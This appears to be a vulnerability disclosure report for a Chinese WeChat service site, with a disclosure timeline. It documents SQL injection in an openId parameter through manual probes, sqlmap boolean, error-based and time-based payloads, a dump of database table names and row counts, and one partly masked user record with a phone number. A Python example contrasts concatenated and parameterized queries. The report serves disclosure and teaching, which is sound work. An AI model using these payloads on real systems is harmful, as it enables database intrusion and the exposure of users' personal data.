2016-01-04: Details sent to the vendor, awaiting vendor handling
2016-01-08: Vendor confirmed; details disclosed to the vendor only
2016-01-18: Details disclosed to core white hats and relevant domain experts
2016-01-28: Details disclosed to regular white hats
2016-02-07: Details disclosed to intern white hats
2016-02-22: Details disclosed to the public
Number registration
Open it in a browser and click "I want to recommend" (我要推荐):
http://**.**.**.**/hkwx/suggestionPersonController.do?goRandomPage&openId=*********
Enter '
Enter 'and'1'='1
Enter 'and'1'='2
The three inputs behave differently (error, normal page, different page), which is the boolean-blind differential. Injection point:
http://**.**.**.**/hkwx/suggestionPersonController.do?goRandomPage&openId=**********
sqlmap identified the following injection points with a total of 246 HTTP(s) requests:
---
Place: GET
Parameter: openId
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: goRandomPage&openId=oV*************' AND 7886=7886 AND 'mXXN'='mXXN

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: goRandomPage&openId=oV*************' AND (SELECT 6649 FROM(SELECT COUNT(*),CONCAT(0x716b696471,(SELECT (CASE WHEN (6649=6649) THEN 1 ELSE 0 END)),0x7163737871,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'zrCN'='zrCN

    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: goRandomPage&openId=oV*************' AND SLEEP(5) AND 'fOLT'='fOLT
---
web application technology: Nginx, JSP
back-end DBMS: MySQL 5.0
Databases
available databases [5]:
[*] hkwx
[*] information_schema
[*] mysql
[*] performance_schema
[*] test
current database: 'hkwx'
Database: hkwx
+------------------------------+---------+
| Table                        | Entries |
+------------------------------+---------+
| weixin_mbmobile_detail       | 1055712 |
| suggestionperson             | 1005631 |
| menuclick201506              | 854342  |
| wy_mbkh_data                 | 845483  |
| menuclick201412              | 788829  |
| menuclick201509              | 693634  |
| menuclick201505              | 652051  |
| menuclick201411              | 619970  |
| userinfo                     | 619458  |
| gzuserinfo                   | 592817  |
| weixin_motheractivity_record | 581052  |
| menuclick201508              | 573609  |
| menuclick201410              | 556975  |
| menuclick201510              | 554747  |
| menuclick201501              | 538485  |
| menuclick201507              | 469292  |
| menuclick201503              | 460616  |
| receivetext                  | 434467  |
| weixin_user_school           | 395047  |
| menuclick201511              | 385406  |
| menuclick201504              | 384474  |
| menuclick201502              | 383457  |
| menuclick201512              | 378417  |
| weixin_qxperson              | 264192  |
| weixin_aim_mobile            | 142930  |
| regist                       | 124220  |
| menuclick201601              | 111508  |
| weixin_business_record       | 95157   |
| menuclick201409              | 90158   |
| prizerecord                  | 84053   |
| weixin_motheractivity        | 78452   |
| weixin_gzyh_gprs             | 40716   |
| weixin_task_mobile           | 35676   |
| t_s_log                      | 34381   |
| weixin_business_total        | 16170   |
| hduserinfo                   | 10090   |
| weixin_setword_total         | 6946    |
| weixin_setword_record        | 6791    |
| menuclick_total              | 6397    |
| menuclick201408              | 6118    |
| hdrecord                     | 5540    |
| regist_total                 | 4250    |
| weixin_signin                | 4076    |
| weixin_qian_dao              | 3145    |
| weixin_kuandai_college       | 2634    |
| weixin_mobile_vote_record    | 1740    |
| sharerecord                  | 1685    |
| weixin_target_mobile         | 882     |
| weixin_fwzx_user             | 783     |
| test                         | 658     |
| gzuserinfo_total             | 538     |
| t_s_attachment               | 500     |
| userinfo_total               | 495     |
| t_s_document                 | 487     |
| weixin_jt_manager            | 374     |
| integration                  | 349     |
| t_s_online                   | 334     |
| weixin_scyw_activityorder    | 330     |
| weixin_year_metting          | 247     |
| weixin_tj_activityuser       | 236     |
| weixin_recommend_card        | 174     |
| t_s_role_function            | 144     |
| weixin_sc_taocan_yuy         | 141     |
| weixin_tj_activityrecord     | 136     |
| t_s_function                 | 123     |
| newsitem                     | 113     |
.....
select * from userinfo limit 100,1; [7]:
[*]  [*] 15093*****61 [*] 0 [*] 2014-10-06 22:04:25 [*] 2c8f81884b002435014b110d882d12be [*] gh_065a64f56fc7 [*] oVxGUjg-8Bc****DX8Q28A
With weixin_user_school, a school can be looked up from a phone number.
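Why the three openId probes above separate a concatenated query from a parameterized one, as an added example that is not part of the report: an in-memory SQLite table stands in for the app's MySQL userinfo table (the column names, the sample openId/mobile values, and the assumption that the page looks users up by openId are all constructed here).

```python
import sqlite3

# Constructed sample rows; these openId and mobile values are made up.
SAMPLE_ROWS = [
    ("oVxGUjg-AAAA", "13800000001"),
    ("oVxGUjg-BBBB", "13800000002"),
]
VALID_OPENID = "oVxGUjg-AAAA"

# The three inputs from the report, appended to an otherwise valid openId
# (the same position sqlmap's payloads use).
PROBES = [VALID_OPENID + s for s in ("'", "'and'1'='1", "'and'1'='2")]


def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE userinfo (openid TEXT, mobile TEXT)")
    conn.executemany("INSERT INTO userinfo VALUES (?, ?)", SAMPLE_ROWS)
    return conn


def lookup_vulnerable(conn, open_id):
    """String concatenation: the input becomes part of the SQL grammar."""
    sql = "SELECT mobile FROM userinfo WHERE openid='" + open_id + "'"
    try:
        return [row[0] for row in conn.execute(sql)]
    except sqlite3.Error:
        return "error"  # a bare quote breaks the statement (probe 1)


def lookup_safe(conn, open_id):
    """Parameterized query: the input is only ever compared as a value."""
    sql = "SELECT mobile FROM userinfo WHERE openid=?"
    return [row[0] for row in conn.execute(sql, (open_id,))]


def probe_results(lookup):
    """Observable outcome of each probe, in PROBES order.

    A vulnerable lookup yields three different outcomes (error, a row,
    no row): the differential sqlmap reports as boolean-based blind.
    A parameterized lookup yields the same outcome for all three.
    """
    conn = make_db()
    return [lookup(conn, p) for p in PROBES]
```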
Severity: High
Vulnerability Rank: 10
Confirmed at: 2016-01-08 18:19
CNVD confirmed and reproduced the described issue and has notified the website operator by email through its public contact channel; the operator will provide a remediation plan.
Vendor response: none yet.